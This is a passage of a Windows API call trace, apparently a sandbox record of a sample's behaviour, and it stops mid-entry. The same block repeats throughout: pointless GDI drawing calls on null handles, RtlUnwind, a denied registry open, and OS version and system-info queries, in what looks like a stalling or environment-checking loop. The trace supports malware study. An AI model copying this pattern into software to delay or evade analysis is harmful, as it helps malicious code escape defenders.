[0087.674] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.674] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.674] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.674] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.674] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.674] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x780401cd [0087.674] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x760401d0 [0087.674] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040996 [0087.674] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040997 [0087.674] CombineRgn (hrgnDst=0x1040996, hrgnSrc1=0x780401cd, hrgnSrc2=0x760401d0, iMode=1) returned 1 [0087.674] CombineRgn (hrgnDst=0x1040997, hrgnSrc1=0x780401cd, hrgnSrc2=0x760401d0, iMode=4) returned 2 [0087.674] CreateSolidBrush (color=0xff) returned 0x2100995 [0087.674] CreateSolidBrush (color=0xff0000) returned 0x1100998 [0087.674] DeleteObject (ho=0x1100998) returned 1 [0087.675] DeleteObject (ho=0x760401d0) returned 1 [0087.675] DeleteObject (ho=0x780401cd) returned 1 [0087.675] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.675] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.675] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.675] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.675] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.675] BeginPath (hdc=0x0) returned 0 [0087.675] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.675] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.675] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.675] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.675] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.675] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.675] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.675] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.675] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x770401d0 [0087.675] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x790401cd [0087.675] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040999 [0087.675] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104099a [0087.675] CombineRgn (hrgnDst=0x1040999, hrgnSrc1=0x770401d0, hrgnSrc2=0x790401cd, iMode=1) returned 1 [0087.675] CombineRgn (hrgnDst=0x104099a, hrgnSrc1=0x770401d0, hrgnSrc2=0x790401cd, iMode=4) returned 2 [0087.675] CreateSolidBrush (color=0xff) returned 0x2100998 [0087.675] CreateSolidBrush (color=0xff0000) returned 0x110099b [0087.675] DeleteObject (ho=0x110099b) returned 1 [0087.675] DeleteObject (ho=0x790401cd) returned 1 [0087.675] DeleteObject (ho=0x770401d0) returned 1 [0087.675] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.675] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.675] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.675] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.675] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.675] BeginPath (hdc=0x0) returned 0 [0087.675] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.675] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.675] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.675] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.675] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.675] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.676] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.676] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.676] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7a0401cd [0087.676] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x780401d0 [0087.676] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104099c [0087.676] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104099d [0087.676] CombineRgn (hrgnDst=0x104099c, hrgnSrc1=0x7a0401cd, hrgnSrc2=0x780401d0, iMode=1) returned 1 [0087.676] CombineRgn (hrgnDst=0x104099d, hrgnSrc1=0x7a0401cd, hrgnSrc2=0x780401d0, iMode=4) returned 2 [0087.676] CreateSolidBrush (color=0xff) returned 0x210099b [0087.676] CreateSolidBrush (color=0xff0000) returned 0x110099e [0087.676] DeleteObject (ho=0x110099e) returned 1 [0087.676] DeleteObject (ho=0x780401d0) returned 1 [0087.676] DeleteObject (ho=0x7a0401cd) returned 1 [0087.676] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.676] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.676] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.676] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.676] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.676] BeginPath (hdc=0x0) returned 0 [0087.676] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.676] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.676] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.676] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.676] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.676] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.676] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.676] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.676] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x790401d0 [0087.676] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7b0401cd [0087.676] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104099f [0087.676] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a0 [0087.676] CombineRgn (hrgnDst=0x104099f, hrgnSrc1=0x790401d0, hrgnSrc2=0x7b0401cd, iMode=1) returned 1 [0087.676] CombineRgn (hrgnDst=0x10409a0, hrgnSrc1=0x790401d0, hrgnSrc2=0x7b0401cd, iMode=4) returned 2 [0087.676] CreateSolidBrush (color=0xff) returned 0x210099e [0087.676] CreateSolidBrush (color=0xff0000) returned 0x11009a1 [0087.676] DeleteObject (ho=0x11009a1) returned 1 [0087.676] DeleteObject (ho=0x7b0401cd) returned 1 [0087.677] DeleteObject (ho=0x790401d0) returned 1 [0087.677] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.677] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.677] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.677] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.677] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.677] BeginPath (hdc=0x0) returned 0 [0087.677] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.677] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.677] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.677] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.677] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.677] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.677] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.677] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.677] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7c0401cd [0087.677] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7a0401d0 [0087.677] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a2 [0087.677] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a3 [0087.677] CombineRgn (hrgnDst=0x10409a2, hrgnSrc1=0x7c0401cd, hrgnSrc2=0x7a0401d0, iMode=1) returned 1 [0087.677] CombineRgn (hrgnDst=0x10409a3, hrgnSrc1=0x7c0401cd, hrgnSrc2=0x7a0401d0, iMode=4) returned 2 [0087.677] CreateSolidBrush (color=0xff) returned 0x21009a1 [0087.677] CreateSolidBrush (color=0xff0000) returned 0x11009a4 [0087.677] DeleteObject (ho=0x11009a4) returned 1 [0087.677] DeleteObject (ho=0x7a0401d0) returned 1 [0087.677] DeleteObject (ho=0x7c0401cd) returned 1 [0087.677] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.677] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.677] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.677] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.677] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.677] BeginPath (hdc=0x0) returned 0 [0087.677] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.677] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.677] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.677] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.677] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.677] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.677] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.677] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.678] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7b0401d0 [0087.678] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7d0401cd [0087.678] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a5 [0087.678] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a6 [0087.678] CombineRgn (hrgnDst=0x10409a5, hrgnSrc1=0x7b0401d0, hrgnSrc2=0x7d0401cd, iMode=1) returned 1 [0087.678] CombineRgn (hrgnDst=0x10409a6, hrgnSrc1=0x7b0401d0, hrgnSrc2=0x7d0401cd, iMode=4) returned 2 [0087.678] CreateSolidBrush (color=0xff) returned 0x21009a4 [0087.678] CreateSolidBrush (color=0xff0000) returned 0x11009a7 [0087.678] DeleteObject (ho=0x11009a7) returned 1 [0087.678] DeleteObject (ho=0x7d0401cd) returned 1 [0087.678] DeleteObject (ho=0x7b0401d0) returned 1 [0087.678] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.678] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.678] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.678] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.678] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.678] BeginPath (hdc=0x0) returned 0 [0087.678] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.678] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.678] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.678] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.678] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.678] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.678] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.678] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.678] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7e0401cd [0087.678] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7c0401d0 [0087.678] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a8 [0087.678] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a9 [0087.678] CombineRgn (hrgnDst=0x10409a8, hrgnSrc1=0x7e0401cd, hrgnSrc2=0x7c0401d0, iMode=1) returned 1 [0087.678] CombineRgn (hrgnDst=0x10409a9, hrgnSrc1=0x7e0401cd, hrgnSrc2=0x7c0401d0, iMode=4) returned 2 [0087.678] CreateSolidBrush (color=0xff) returned 0x21009a7 [0087.678] CreateSolidBrush (color=0xff0000) returned 0x11009aa [0087.678] DeleteObject (ho=0x11009aa) returned 1 [0087.678] DeleteObject (ho=0x7c0401d0) returned 1 [0087.678] DeleteObject (ho=0x7e0401cd) returned 1 [0087.678] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.678] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.679] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.679] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.679] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.679] BeginPath (hdc=0x0) returned 0 [0087.679] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.679] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.679] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.679] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.679] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.679] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.679] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.679] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.679] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7d0401d0 [0087.679] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7f0401cd [0087.679] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ab [0087.679] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ac [0087.679] CombineRgn (hrgnDst=0x10409ab, hrgnSrc1=0x7d0401d0, hrgnSrc2=0x7f0401cd, iMode=1) returned 1 [0087.679] CombineRgn (hrgnDst=0x10409ac, hrgnSrc1=0x7d0401d0, hrgnSrc2=0x7f0401cd, iMode=4) returned 2 [0087.679] CreateSolidBrush (color=0xff) returned 0x21009aa [0087.679] CreateSolidBrush (color=0xff0000) returned 0x11009ad [0087.679] DeleteObject (ho=0x11009ad) returned 1 [0087.679] DeleteObject (ho=0x7f0401cd) returned 1 [0087.679] DeleteObject (ho=0x7d0401d0) returned 1 [0087.679] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.679] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.679] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.679] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.679] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.679] BeginPath (hdc=0x0) returned 0 [0087.679] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.679] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.679] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.679] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.679] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.679] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.679] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.679] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.680] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x800401cd [0087.680] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7e0401d0 [0087.680] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ae [0087.680] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409af [0087.680] CombineRgn (hrgnDst=0x10409ae, hrgnSrc1=0x800401cd, hrgnSrc2=0x7e0401d0, iMode=1) returned 1 [0087.680] CombineRgn (hrgnDst=0x10409af, hrgnSrc1=0x800401cd, hrgnSrc2=0x7e0401d0, iMode=4) returned 2 [0087.680] CreateSolidBrush (color=0xff) returned 0x21009ad [0087.680] CreateSolidBrush (color=0xff0000) returned 0x11009b0 [0087.680] DeleteObject (ho=0x11009b0) returned 1 [0087.680] DeleteObject (ho=0x7e0401d0) returned 1 [0087.680] DeleteObject (ho=0x800401cd) returned 1 [0087.680] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.680] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.680] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.680] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.680] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.680] BeginPath (hdc=0x0) returned 0 [0087.680] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.680] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.680] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.680] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.680] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.680] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.680] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.680] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.680] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7f0401d0 [0087.680] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x810401cd [0087.680] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b1 [0087.680] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b2 [0087.680] CombineRgn (hrgnDst=0x10409b1, hrgnSrc1=0x7f0401d0, 